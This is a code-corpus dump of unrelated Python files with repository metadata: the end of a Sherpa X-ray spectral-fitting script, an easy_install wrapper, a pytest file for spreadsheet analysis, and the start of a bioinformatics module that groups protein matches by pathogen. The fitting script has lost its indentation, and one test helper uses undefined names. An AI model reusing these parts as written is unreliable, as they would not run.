norm_hierr = covar_result.parmaxes[3]
powindx_hierr = covar_result.parmaxes[4]
pownorm_hierr = covar_result.parmaxes[5]
del covar_result
# Check for failed errors (= None) and set them to +/- best-fit value
if not fix_nH_Gal:
if nH_loerr == None: nH_loerr = -nH
if nH_hierr == None: nH_hierr = nH
if kT_loerr == None: kT_loerr = -kT
if kT_hierr == None: kT_hierr = kT
if Z_loerr == None: Z_loerr = -Z
if Z_hierr == None: Z_hierr = Z
if norm_loerr == None: norm_loerr = -norm
if norm_hierr == None: norm_hierr = norm
if powindx_loerr == None: powindx_loerr = -powindx
if powindx_hierr == None: powindx_hierr = powindx
if pownorm_loerr == None: pownorm_loerr = -pownorm
if pownorm_hierr == None: pownorm_hierr = pownorm
else:
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
powindx_loerr = 0.0
pownorm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
powindx_hierr = 0.0
pownorm_hierr = 0.0
else: # if total counts < min_counts, just write zeros
                print('\n Warning: no fit performed for region '+str(i + reg_num_to_start)+':')
if nobs > 1:
print(' Spectra have insufficient counts after filtering or do not exist.')
else:
print(' Spectrum has insufficient counts after filtering or does not exist.')
print(' --> All parameters for this region set to 0.0.')
kT = 0.0
Z = 0.0
nH = 0.0
norm = 0.0
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
powindx_loerr = 0.0
pownorm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
powindx_hierr = 0.0
pownorm_hierr = 0.0
                red_chi2 = 0.0
                num_bins = 0
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (i+reg_num_to_start, kT, kT_loerr, kT_hierr, Z, Z_loerr, Z_hierr, norm, norm_loerr, norm_hierr, powindx, powindx_loerr, powindx_hierr, pownorm, pownorm_loerr, pownorm_hierr, nH, nH_loerr, nH_hierr, red_chi2, totcnts, num_bins) )
results_file.close()
# Finally, make sure all regions have an entry in the fit results file
# (this shouldn't be needed, but just in case...)
dtype = {'names': ('reg_id', 'kT', 'kT_lo', 'kT_hi', 'Z', 'Z_lo', 'Z_hi', 'norm', 'norm_lo', 'norm_hi', 'plindx', 'plindx_lo', 'plindx_hi', 'plnorm', 'plnorm_lo', 'plnorm_hi', 'nH', 'nH_lo', 'nH_hi', 'chi2', 'totcnts', 'nbins'), 'formats': ('i4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'i4')}
data = numpy.loadtxt(fit_results_file, dtype=dtype)
reg_num = data["reg_id"]
missing_regs = []
n_missing = 0
for i in range(len(reg_num)):
if int(reg_num[i]) != i + reg_num_to_start + n_missing:
missing_regs.append(i + reg_num_to_start + n_missing)
n_missing += 1
if n_missing > 0:
results_file = open(fit_results_file, "a") # append missing regions
for i in range(n_missing):
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (missing_regs[i]+reg_num_to_start, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0) )
else:
print('\n Output file ('+fit_results_file+') exists and clobber = False.')
if __name__=='__main__':
from optparse import OptionParser
parser = OptionParser(usage='%prog [options] <spectra_list> <redshift> <nH_Gal> <kT_guess> <Ab_guess> <root>\n\nArguments:\n <spectra_list> input PI file (may be list; if so, prepend filename with "@")\n <redshift> redshift of source\n <nH_Gal> Galactic N_H (10^22 cm^-2)\n <kT_guess> initial guess for temperature\n <Ab_guess> initial guess for abundance\n <root> root of output file containing fit results', version="%prog 0.55")
parser.add_option('--lo_energy', dest='lo_energy', help='lower energy bound for fit (keV); default = 0.5', metavar='VAL', default='0.5')
parser.add_option('--hi_energy', dest='hi_energy', help='upper energy bound for fit (keV); default = 7.0', metavar='VAL', default='7.0')
parser.add_option('--plasma_model', dest='plasma_model', help='plasma model to use in fit (mekal or apec); default = mekal', metavar='VAL', default='mekal')
parser.add_option('--fix_nh', dest='fix_nH', help='Freeze nH; default = True', metavar='VAL', default=True)
parser.add_option('--fix_abund', dest='fix_abund', help='Freeze abundance; default = False', metavar='VAL', default=False)
parser.add_option('-c', action='store_true', dest='clobber', help='clobber any existing files', default=False)
(options, args) = parser.parse_args()
if len(args) == 6:
spectra_list = args[0]
redshift = args[1]
nH_Gal = args[2]
kT_guess = args[3]
Ab_guess = args[4]
root = args[5]
lo_energy = options.lo_energy
hi_energy = options.hi_energy
plasma_model = options.plasma_model
fix_nH_Gal = options.fix_nH
fix_abund = options.fix_abund
clobber = options.clobber
# Read spectra file names from the spectra_list if it begins with '@'
if spectra_list[0] == '@':
spectra_list_file = open(spectra_list[1:], "r")
spectra_list = spectra_list_file.readlines()
spectra_list_file.close()
for i in range(len(spectra_list)): spectra_list[i] = spectra_list[i].rstrip() # trim newlines
else:
spectra_list = [spectra_list]  # a single file name; wrap it in a list
# Call Sherpa
call_sherpa_1T(spectra_list, redshift, nH_Gal, kT_guess, Ab_guess, root, lo_energy=lo_energy, hi_energy=hi_energy, plasma_model=plasma_model, fix_nH_Gal=fix_nH_Gal, fix_abund=fix_abund, clobber=clobber)
else:
parser.print_help()
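# Example invocation (a sketch; the script name, spectrum list and output root
# below are hypothetical, while the argument order and options come from the
# usage text above):
#
#   python fit_spectra.py --lo_energy 0.7 --hi_energy 7.0 --plasma_model apec \
#       @spectra.lst 0.055 0.04 3.0 0.3 cluster_fits
#
# Here spectra.lst lists one PI file per line, 0.055 is the redshift, 0.04 is
# the Galactic N_H (10^22 cm^-2), 3.0 and 0.3 are the initial kT and abundance
# guesses, and cluster_fits is the root of the output fit-results file.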
|
[
"drafferty@hs.uni-hamburg.de"
] |
drafferty@hs.uni-hamburg.de
|
e756a6abde824ff3cc7b491d79f58b05aca71f54
|
a6fbb304c09196efb9b1a613e2a91aab2bb2515a
|
/venv/bin/easy_install
|
cf1380709195f37ebc1110e87751caf07df9618c
|
[] |
no_license
|
ShipDandy/jojosBazaar
|
6c1a6cebcad455a5dfa4c217726ddc79fc3333cd
|
c2746595342cb041bb18533bb803a38cfd85b264
|
refs/heads/master
| 2021-05-14T17:38:23.424991
| 2019-03-22T15:56:59
| 2019-03-22T15:56:59
| 116,050,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
#!/Users/zyoosun/Documents/WorkProjects/customStore/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"zyoosun@gmail.com"
] |
zyoosun@gmail.com
|
|
61f1e5d0668f7b160cceab9f1e4404c708073cc9
|
52288a1d0d828f0eb5843b7a9d3e88ec76c1f17b
|
/python/tests/xlsx_info_test.py
|
48412905d1d6633ab47226761f0da044378d9523
|
[] |
no_license
|
uscensusbureau/drb_rounder
|
9e2df83364ce5f5b1e4ea1ee53484d2ed5181e00
|
6e56e6cddb811ae081873fc4383845421aa470b1
|
refs/heads/master
| 2020-03-28T02:29:13.169725
| 2018-08-24T04:24:51
| 2018-08-24T04:24:51
| 147,573,770
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,741
|
py
|
#!/usr/bin/env python3
import pytest
import os
import os.path
import sys
from common import TEST_FILES_DIR
from latex_tools import run_latex
from xlsx_info import *
from tytable import HTML, TEXT, LATEX
import subprocess
import shutil
WORK2_DIR = os.path.join( os.path.dirname(__file__), "work2")
XLSX_PATH = os.path.join( TEST_FILES_DIR, "spreadsheet.xlsx")
SPREADSHEET_XLSX=os.path.join(WORK2_DIR, os.path.basename(XLSX_PATH))
SPREADSHEET_TEX=os.path.join(WORK2_DIR, os.path.basename(XLSX_PATH)).replace(".xlsx",".tex")
SPREADSHEET_TXT=os.path.join(WORK2_DIR, os.path.basename(XLSX_PATH)).replace(".xlsx",".txt")
def rm_Rf(workdir):
# Clear out the workdir
if os.path.exists(workdir):
for (root,dirs,files) in os.walk(workdir,topdown=False):
for fn in files:
os.unlink(os.path.join(root,fn))
for d in dirs:
os.rmdir(os.path.join(root,d))
os.rmdir(workdir)
def make_workdir(workdir):
rm_Rf(WORK_DIR)
os.mkdir(WORK_DIR)
# copy the files over
for fn in os.listdir(WEEKLY_TEST_DIR):
# Do not copy over files beginning with '.'
if fn[0]=='.':
continue
fnpath = os.path.join(WEEKLY_TEST_DIR,fn)
shutil.copy(fnpath,WORK_DIR)
def test_find_sigfigs():
assert SigFigStats.find_sigfigs(0) == 0
assert SigFigStats.find_sigfigs(1) == 1
assert SigFigStats.find_sigfigs(2) == 1
assert SigFigStats.find_sigfigs(1.1) == 2
assert SigFigStats.find_sigfigs(1.23) == 3
assert SigFigStats.find_sigfigs(12.3) == 3
assert SigFigStats.find_sigfigs(123.) == 3
assert SigFigStats.find_sigfigs("0") == 0
assert SigFigStats.find_sigfigs("1") == 1
assert SigFigStats.find_sigfigs("2") == 1
assert SigFigStats.find_sigfigs("1.1") == 2
assert SigFigStats.find_sigfigs("1.23") == 3
assert SigFigStats.find_sigfigs("12.3") == 3
assert SigFigStats.find_sigfigs("123.") == 3
def test_analyze_xlsx():
""" This just test to make sure that the LaTeX file created can be processed."""
assert SPREADSHEET_TEX != SPREADSHEET_TXT
rm_Rf(WORK2_DIR)
os.mkdir(WORK2_DIR)
shutil.copy(XLSX_PATH, WORK2_DIR)
print("==>",SPREADSHEET_TEX, SPREADSHEET_TXT)
with open(SPREADSHEET_TEX,"w") as f:
f.write("\\documentclass{article}\\begin{document}\n")
f.write( analyze_xlsx( filename=SPREADSHEET_XLSX, mode=LATEX))
f.write("\\end{document}\n")
with open(SPREADSHEET_TXT,"w") as f:
f.write( analyze_xlsx( filename=SPREADSHEET_XLSX, mode=TEXT))
run_latex(SPREADSHEET_TEX, repeat=1)
if __name__=="__main__":
test_analyze_xlsx()
ret = subprocess.call([sys.executable,'make_combined_file.py',WORK_DIR])
assert ret==0
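# A minimal way to run just this module's tests (assuming pytest is installed
# and the repository root is the working directory; the path comes from this
# file's location in the repo):
#
#   python -m pytest python/tests/xlsx_info_test.py -v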
|
[
"simson.l.garfinkel@census.gov"
] |
simson.l.garfinkel@census.gov
|
d52bb3601e2eadbe52c4443c22c3d81cbac3450f
|
c2c4716d5bc35c9fad65bee79d5575bea06d371b
|
/dark/civ/proteins.py
|
8d4563cbfdb1e802cc4ca3c1d92f34dbaccce984
|
[
"MIT"
] |
permissive
|
terrycojones/dark-matter
|
776807bce788fd3354f7e125f176e5affc4693eb
|
67d16f870db6b4239e17e542bc6e3f072dc29c75
|
refs/heads/master
| 2023-05-10T21:26:44.977749
| 2021-08-17T15:18:12
| 2021-08-17T15:18:12
| 23,939,945
| 1
| 0
| null | 2014-12-02T22:12:02
| 2014-09-11T23:44:49
|
Python
|
UTF-8
|
Python
| false
| false
| 101,824
|
py
|
from __future__ import print_function
import os
import re
import sqlite3
import sys
import numpy as np
from Bio import SeqIO
from cachetools import LRUCache, cachedmethod
from collections import defaultdict
from functools import partial
from json import load
from operator import attrgetter, itemgetter
from os.path import dirname, exists, join
from six import string_types
from six.moves.urllib.parse import quote
from textwrap import fill
from warnings import warn
from dark.dimension import dimensionalIterator
from dark.errors import DatabaseDuplicationError
from dark.fasta import FastaReads
from dark.fastq import FastqReads
from dark.filter import TitleFilter
from dark.genbank import GenomeRanges
from dark.html import NCBISequenceLinkURL, NCBISequenceLink
from dark.reads import Reads
from dark.taxonomy import (
# isDNAVirus, isRNAVirus, formatLineage,
lineageTaxonomyLinks, Hierarchy,
LineageElement)
class PathogenSampleFiles(object):
"""
Maintain a cache of FASTA/FASTQ file names for the samples that contain a
given pathogen, create de-duplicated (by read id) FASTA/FASTQ files
for each pathogen/sample pair, provide functions to write out index files
of samples numbers (which are generated here in C{self.add}),
and provide a filename lookup function for pathogen/sample combinations
or just pathogen accessions by themselves.
@param proteinGrouper: An instance of C{ProteinGrouper}.
@param format_: A C{str}, either 'fasta' or 'fastq' indicating the format
of the files containing the reads matching proteins.
@raise ValueError: If C{format_} is unknown.
"""
def __init__(self, proteinGrouper, format_='fasta'):
self._proteinGrouper = proteinGrouper
if format_ in ('fasta', 'fastq'):
self._format = format_
self._readsClass = FastaReads if format_ == 'fasta' else FastqReads
else:
raise ValueError("format_ must be either 'fasta' or 'fastq'.")
self._pathogens = {}
self._samples = {}
self._readsFilenames = {}
def add(self, genomeAccession, sampleName):
"""
Add a (pathogen accession number, sample name) combination and get its
FASTA/FASTQ file name and unique read count. Write the FASTA/FASTQ file
if it does not already exist. Save the unique read count into
C{self._proteinGrouper}.
@param genomeAccession: A C{str} pathogen accession number.
@param sampleName: A C{str} sample name.
@return: A C{str} giving the FASTA/FASTQ file name holding all the
reads (without duplicates, by id) from the sample that matched the
proteins in the given pathogen.
"""
sampleIndex = self._samples.setdefault(sampleName, len(self._samples))
try:
return self._readsFilenames[(genomeAccession, sampleIndex)]
except KeyError:
reads = Reads()
for proteinMatch in self._proteinGrouper.genomeAccessions[
genomeAccession][sampleName]['proteins'].values():
for read in self._readsClass(proteinMatch['readsFilename']):
reads.add(read)
saveFilename = join(
proteinMatch['outDir'],
'pathogen-%s-sample-%d.%s' % (genomeAccession, sampleIndex,
self._format))
reads.filter(removeDuplicatesById=True)
nReads = reads.save(saveFilename, format_=self._format)
# Save the unique read count into self._proteinGrouper
self._proteinGrouper.genomeAccessions[
genomeAccession][sampleName]['uniqueReadCount'] = nReads
self._readsFilenames[
(genomeAccession, sampleIndex)] = saveFilename
return saveFilename
def lookup(self, genomeAccession, sampleName):
"""
Look up a pathogen accession number, sample name combination and get
its FASTA/FASTQ file name.
This method should be used instead of C{add} in situations where
you want an exception to be raised if a pathogen/sample combination has
not already been passed to C{add}.
@param genomeAccession: A C{str} pathogen accession number.
@param sampleName: A C{str} sample name.
@raise KeyError: If the pathogen accession number or sample name have
not been seen, either individually or in combination.
@return: A C{str} filename retrieved from self._readsFilenames
"""
return self._readsFilenames[
(genomeAccession, self._samples[sampleName])]
def writeSampleIndex(self, fp):
"""
Write a file of sample indices and names, sorted by index.
@param fp: A file-like object, opened for writing.
"""
print('\n'.join(
'%d %s' % (index, name) for (index, name) in
sorted((index, name) for (name, index) in self._samples.items())
), file=fp)
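# A rough usage sketch for PathogenSampleFiles (the grouper instance, accession
# and sample name are hypothetical; the method names and arguments come from
# the class above):
#
#   psf = PathogenSampleFiles(proteinGrouper, format_='fasta')
#   fastaName = psf.add('NC_000000.1', 'sample-1')  # writes de-duplicated reads
#   assert psf.lookup('NC_000000.1', 'sample-1') == fastaName
#   with open('samples.index', 'w') as fp:
#       psf.writeSampleIndex(fp)  # lines like "0 sample-1"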
class ProteinGrouper(object):
"""
Group matched proteins by the pathogen they come from.
@param proteinGenomeDatabase: A connection to an Sqlite3 database
holding protein and genome information, as built by
C{make-protein-database.py}.
@param assetDir: The C{str} directory name where
C{noninteractive-alignment-panel.py} put its HTML, blue plot and
alignment panel images, and FASTA or FASTQ files. This must be relative
to the filenames that will later be passed to C{addFile}.
@param sampleName: A C{str} sample name. This takes precedence over
C{sampleNameRegex} (the two cannot be used together, obviously).
@param sampleNameRegex: A C{str} regular expression that can be used to
extract a short sample name from full file names subsequently passed
to C{self.addFile}. The regular expression must have a matching group
(delimited by parentheses) to capture the part of the file name that
should be used as the sample name.
@param format_: A C{str}, either 'fasta' or 'fastq' indicating the format
of the files containing the reads matching proteins.
@param saveReadLengths: If C{True}, save the lengths of all reads matching
proteins.
@param titleRegex: A regex that pathogen names must match.
Note that this matching is done on the final part of the protein title
in square brackets, according to the convention used by the NCBI viral
refseq database and RVDB.
@param negativeTitleRegex: A regex that pathogen names must not match.
Note that this matching is done on the final part of the protein title
in square brackets, according to the convention used by the NCBI viral
refseq database and RVDB.
@param pathogenDataDir: The C{str} directory where per-pathogen information
(e.g., collected reads across all samples) should be written. Will be
created (in C{self.toHTML}) if it doesn't exist.
@raise ValueError: If C{format_} is unknown.
"""
VIRALZONE = 'https://viralzone.expasy.org/search?query='
ICTV = 'https://talk.ictvonline.org/search-124283882/?q='
READCOUNT_MARKER = '*READ-COUNT*'
READ_AND_HSP_COUNT_STR_SEP = '/'
def __init__(self, proteinGenomeDatabase, taxonomyDatabase, assetDir='out',
sampleName=None, sampleNameRegex=None, format_='fasta',
saveReadLengths=False, titleRegex=None,
negativeTitleRegex=None, pathogenDataDir='pathogen-data'):
self._db = proteinGenomeDatabase
self._taxdb = taxonomyDatabase
self._assetDir = assetDir
self._sampleName = sampleName
self._sampleNameRegex = (re.compile(sampleNameRegex) if sampleNameRegex
else None)
if format_ in ('fasta', 'fastq'):
self._format = format_
else:
raise ValueError("format_ must be either 'fasta' or 'fastq'.")
self._saveReadLengths = saveReadLengths
if titleRegex or negativeTitleRegex:
self.titleFilter = TitleFilter(
positiveRegex=titleRegex, negativeRegex=negativeTitleRegex)
else:
self.titleFilter = None
self._pathogenDataDir = pathogenDataDir
# genomeAccessions will be a dict of dicts of dicts. The first
# two keys will be a pathogen accession and a sample name. The
# final dict will contain 'proteins' (a list of dicts) and
# 'uniqueReadCount' (an int).
self.genomeAccessions = defaultdict(dict)
# sampleNames is keyed by sample name and will have values that hold
# the sample's alignment panel index.html file.
self.sampleNames = {}
self.pathogenSampleFiles = PathogenSampleFiles(self, format_=format_)
def _title(self, pathogenType):
"""
Create a title summarizing the pathogens and samples.
@param pathogenType: A C{str}, either 'viral' or 'bacterial'.
@return: A C{str} title.
"""
assert pathogenType in ('viral', 'bacterial')
nPathogens = len(self.genomeAccessions)
nSamples = len(self.sampleNames)
if pathogenType == 'bacterial':
what = 'bacterium' if nPathogens == 1 else 'bacteria'
else:
what = 'virus%s' % ('' if nPathogens == 1 else 'es')
return (
'Proteins from %d %s were found in %d sample%s.' %
(nPathogens, what, nSamples, '' if nSamples == 1 else 's'))
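# For example (counts hypothetical), with 2 viral genomes matched across 3
# samples, _title('viral') returns
# 'Proteins from 2 viruses were found in 3 samples.'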
def addFile(self, filename, fp):
"""
Read and record protein information for a sample.
@param filename: A C{str} file name.
@param fp: An open file pointer to read the file's data from.
@raise ValueError: If information for a pathogen/protein/sample
combination is given more than once.
"""
if self._sampleName:
sampleName = self._sampleName
elif self._sampleNameRegex:
match = self._sampleNameRegex.search(filename)
if match:
sampleName = match.group(1)
else:
sampleName = filename
else:
sampleName = filename
outDir = join(dirname(filename), self._assetDir)
self.sampleNames[sampleName] = join(outDir, 'index.html')
for index, proteinLine in enumerate(fp):
(coverage, medianScore, bestScore, readCount, hspCount,
proteinLength, longName) = proteinLine.split(None, 6)
proteinInfo = self._db.findProtein(longName)
if proteinInfo is None:
try:
accession = self._db.proteinAccession(longName)
except IndexError:
accession = longName
# We could arguably just emit a warning here. This situation
# arises (at least) when we are re-processing output from an
# earlier run that used a different genome/protein
# database. For example, the host specificity information about
# a virus might change or the NCBI might withdraw it, causing
# it to be excluded from a new database that we make. If an
# now-not-present accession number appears in the DIAMOND or
# alignment panel summary protein file, it will trigger this
# error.
#
# For now I (Terry) have decided to keep things strict here and
# raise an Exception. Otherwise I don't think there's any
# guarantee that a warning to stderr would be seen, and only
# issuing a warning would risk silently being in a situation
# where nothing at all matched, e.g., due to passing an
# incorrect database name. This error happens infrequently and
# IMO it's better that we cause an error, force the user
# (usually me, unfortunately) to investigate, clean up
# properly, and re-run.
raise ValueError(
'Could not find protein info for accession number %r '
'(extracted from %r). In the past, this hard-to-debug '
'(hence this long message!) error has resulted from using '
'a new genome/protein database to process results that '
'were generated based on an earlier version of the '
'database, in which case proteins that were present then '
'are not now in the database.' % (accession, longName))
proteinName = (proteinInfo['product'] or proteinInfo['gene'] or
'unknown')
proteinAccession = proteinInfo['accession']
genomeInfo = self._db.findGenome(longName)
genomeName = genomeInfo['name']
genomeAccession = genomeInfo['accession']
# Ignore genomes with names we don't want.
if (self.titleFilter and self.titleFilter.accept(
genomeName) == TitleFilter.REJECT):
continue
if sampleName not in self.genomeAccessions[genomeAccession]:
self.genomeAccessions[genomeAccession][sampleName] = {
'proteins': {},
'uniqueReadCount': None,
}
proteins = self.genomeAccessions[
genomeAccession][sampleName]['proteins']
# We should only receive one line of information for a given
# genome/sample/protein combination.
if proteinAccession in proteins:
raise ValueError(
'Protein %r already seen for genome %r (%s) sample %r.' %
(proteinAccession, genomeName, genomeAccession,
sampleName))
readsFilename = join(outDir,
'%s.%s' % (proteinAccession, self._format))
if longName.startswith(SqliteIndexWriter.SEQUENCE_ID_PREFIX +
SqliteIndexWriter.SEQUENCE_ID_SEPARATOR):
proteinURL = NCBISequenceLinkURL(longName, field=2)
genomeURL = NCBISequenceLinkURL(longName, field=4)
else:
proteinURL = genomeURL = None
proteinInfo = proteins[proteinAccession] = {
'accession': proteinAccession,
'bestScore': float(bestScore),
'bluePlotFilename': join(outDir, '%s.png' % proteinAccession),
'coverage': float(coverage),
'readsFilename': readsFilename,
'hspCount': int(hspCount),
'index': index,
'medianScore': float(medianScore),
'outDir': outDir,
'proteinLength': int(proteinLength),
'proteinName': proteinName,
'proteinURL': proteinURL,
'genomeURL': genomeURL,
'readCount': int(readCount),
}
if proteinInfo['readCount'] == proteinInfo['hspCount']:
proteinInfo['readAndHspCountStr'] = readCount
else:
proteinInfo['readAndHspCountStr'] = '%s%s%s' % (
readCount, self.READ_AND_HSP_COUNT_STR_SEP, hspCount)
if self._saveReadLengths:
readsClass = (FastaReads if self._format == 'fasta'
else FastqReads)
proteins[proteinAccession]['readLengths'] = tuple(
len(read) for read in readsClass(readsFilename))
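# Each line handled by addFile is whitespace-separated with seven fields in
# the order unpacked above (values hypothetical):
#
#   0.8500 45.30 52.10 12 14 512 <full protein title, may contain spaces>
#
# i.e. coverage, median bit score, best bit score, read count, HSP count,
# protein length, and the remainder of the line as the protein's long name.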
def _computeUniqueReadCounts(self):
"""
Add all pathogen / sample combinations to self.pathogenSampleFiles.
This will make all de-duplicated (by id) FASTA/FASTQ files and store
the number of de-duplicated reads into C{self.genomeAccessions}.
"""
for genomeAccession, samples in self.genomeAccessions.items():
for sampleName in samples:
self.pathogenSampleFiles.add(genomeAccession, sampleName)
def toStr(self, title=None, preamble=None, pathogenType='viral'):
"""
Produce a string representation of the pathogen summary.
@param title: The C{str} title for the output.
@param preamble: The C{str} descriptive preamble, or C{None} if no
preamble is needed.
@param pathogenType: A C{str}, either 'viral' or 'bacterial'.
@return: A C{str} suitable for printing.
"""
# Note that the string representation contains much less
# information than the HTML summary. E.g., it does not contain the
# unique (de-duplicated, by id) read count, since that is only computed
# when we are making combined FASTA files of reads matching a
# pathogen.
assert pathogenType in ('viral', 'bacterial')
title = title or 'Summary of %s.' % (
'bacteria' if pathogenType == 'bacterial' else 'viruses')
readCountGetter = itemgetter('readCount')
result = []
append = result.append
result.extend((title, ''))
if preamble:
result.extend((preamble, ''))
result.extend((self._title(pathogenType), ''))
for genomeAccession, samples in self.genomeAccessions.items():
genomeInfo = self._db.findGenome(genomeAccession)
genomeName = genomeInfo['name']
sampleCount = len(samples)
append('%s (in %d sample%s)' %
(genomeName,
sampleCount, '' if sampleCount == 1 else 's'))
for sampleName in sorted(samples):
proteins = samples[sampleName]['proteins']
proteinCount = len(proteins)
totalReads = sum(readCountGetter(p) for p in proteins.values())
append(' %s (%d protein%s, %d read%s)' %
(sampleName,
proteinCount, '' if proteinCount == 1 else 's',
totalReads, '' if totalReads == 1 else 's'))
for proteinName in sorted(proteins):
append(
' %(coverage).2f\t%(medianScore).2f\t'
'%(bestScore).2f\t%(readAndHspCountStr)3s\t'
'%(proteinName)s'
% proteins[proteinName])
append('')
return '\n'.join(result)
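# A rough end-to-end sketch (file name hypothetical; constructor and method
# signatures as documented above):
#
#   grouper = ProteinGrouper(proteinGenomeDatabase, taxonomyDatabase)
#   with open('sample-1-summary.txt') as fp:
#       grouper.addFile('sample-1-summary.txt', fp)
#   print(grouper.toStr(pathogenType='viral'))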
def _genomeName(self, genomeAccession):
"""
Get the name of a genome, given its accession number.
@param genomeAccession: A C{str} pathogen accession number.
@return: A C{str} genome name.
"""
return self._db.findGenome(genomeAccession)['organism']
def _makeSampleSorter(self):
"""
Make a function to sort sample names with, using the 3rd
underscore-separated field of each name as an integer, if possible.
"""
# Note: we could do this without the allSampleNamesHaveIntThirdField
# variable by defining a function in the 'except' clause and adding an
# 'else' to the 'for' loop, but that causes flake8 to complain that the
# unused _key function (in the except) has been redefined (in the
# else).
allSampleNamesHaveIntThirdField = True
for sampleName in self.sampleNames:
try:
int(sampleName.split('_', maxsplit=3)[2])
except (IndexError, ValueError):
allSampleNamesHaveIntThirdField = False
break
if allSampleNamesHaveIntThirdField:
def _key(sampleName):
return int(sampleName.split('_', maxsplit=3)[2])
else:
def _key(sampleName):
return sampleName
self.sampleSort = partial(sorted, key=_key)
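# Example (sample names hypothetical): with samples 'run_A_3_x' and
# 'run_A_12_y', every third underscore-separated field is an integer, so the
# sorter orders them numerically (3 before 12) instead of lexically
# ('12' before '3').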
def toHTML(self, pathogenPanelFilename=None, readCountColors=None,
minProteinFraction=0.0, minProteinCount=0,
pathogenType='viral', title=None, preamble=None,
sampleIndexFilename=None, omitVirusLinks=False,
bootstrapTreeviewDir=None):
"""
Produce an HTML string representation of the pathogen summary.
@param pathogenPanelFilename: If not C{None}, a C{str} filename to
write a pathogen panel PNG image to.
@param readCountColors: Either a C{dark.colors.colorsForCounts}
instance or C{None} for no read count coloring.
@param minProteinFraction: The C{float} minimum fraction of proteins
in a pathogen that must be matched by a sample in order for that
pathogen to be displayed for that sample.
@param minProteinCount: The C{int} minimum number of proteins
in a pathogen that must be matched by a sample in order for that
pathogen to be displayed for that sample.
@param pathogenType: A C{str} giving the type of the pathogen involved,
either 'bacterial' or 'viral'.
@param title: The C{str} title for the HTML page or C{None} to get a
default generic title depending on whether a viral or bacterial
database was matched against.
@param preamble: The C{str} descriptive preamble for the HTML page, or
C{None} if no preamble is needed.
@param sampleIndexFilename: A C{str} filename to write a sample index
file to. Lines in the file will have an integer index, a space, and
then the sample name.
@param omitVirusLinks: If C{True}, links to ICTV and ViralZone will be
omitted in output.
@param bootstrapTreeviewDir: A C{str} giving the directory where the
bootstrap-treeview JS and CSS files may be found. Or C{None} if no
bootstrap-treeview output should be generated.
@return: An HTML C{str} suitable for printing.
"""
if pathogenType == 'bacterial':
singular, plural = 'bacterium', 'bacteria'
elif pathogenType == 'viral':
singular, plural = 'virus', 'viruses'
else:
raise ValueError(
"Unrecognized pathogenType argument: %r. Value must be either "
"'bacterial' or 'viral'." % pathogenType)
if not exists(self._pathogenDataDir):
os.mkdir(self._pathogenDataDir)
title = title or 'Summary of ' + plural
self._makeSampleSorter()
self._computeUniqueReadCounts()
if sampleIndexFilename:
with open(sampleIndexFilename, 'w') as fp:
self.pathogenSampleFiles.writeSampleIndex(fp)
# Figure out if we have to delete some pathogens because the number
# or fraction of its proteins that we have matches for is too low.
if minProteinFraction > 0.0 or minProteinCount > 0:
toDelete = defaultdict(list)
for genomeAccession in self.genomeAccessions:
genomeInfo = self._db.findGenome(genomeAccession)
pathogenProteinCount = genomeInfo['proteinCount']
assert pathogenProteinCount > 0
for s in self.genomeAccessions[genomeAccession]:
sampleProteinCount = len(self.genomeAccessions[
genomeAccession][s]['proteins'])
if sampleProteinCount < minProteinCount:
toDelete[genomeAccession].append(s)
else:
sampleProteinFraction = (
sampleProteinCount / pathogenProteinCount)
if sampleProteinFraction < minProteinFraction:
toDelete[genomeAccession].append(s)
for genomeAccession, samples in toDelete.items():
for sample in samples:
del self.genomeAccessions[genomeAccession][sample]
genomeAccessions = sorted(
(genomeAccession for genomeAccession in self.genomeAccessions
if len(self.genomeAccessions[genomeAccession]) > 0),
key=self._genomeName)
nPathogenNames = len(genomeAccessions)
sampleNames = self.sampleSort(self.sampleNames)
# Be very careful with commas in the following! Long lines that
# should be continued unbroken must not end with a comma.
result = [
'<html>',
'<head>',
'<title>',
title,
'</title>',
'<meta charset="UTF-8">',
'<link rel="stylesheet"',
'href="https://stackpath.bootstrapcdn.com/bootstrap/'
'3.4.1/css/bootstrap.min.css"',
'integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5z'
'CYotlSAcp1+c8xmyTe9GYg1l9a69psu"',
'crossorigin="anonymous">',
]
if bootstrapTreeviewDir:
result.append(
'<link rel="stylesheet" href="%s/bootstrap-treeview.min.css">'
% bootstrapTreeviewDir)
result.extend([
'</head>',
'<body>',
'<script',
'src="https://code.jquery.com/jquery-3.4.1.min.js"',
'integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo="',
'crossorigin="anonymous"></script>',
'<script',
'src="https://stackpath.bootstrapcdn.com/bootstrap/'
'3.4.1/js/bootstrap.min.js"',
'integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5b'
'ApTppSuUkhZXN0VxHd"',
'crossorigin="anonymous"></script>'])
if bootstrapTreeviewDir:
result.append(
'<script src="%s/bootstrap-treeview.min.js"></script>'
% bootstrapTreeviewDir)
result.extend([
'<style>',
'''\
body {
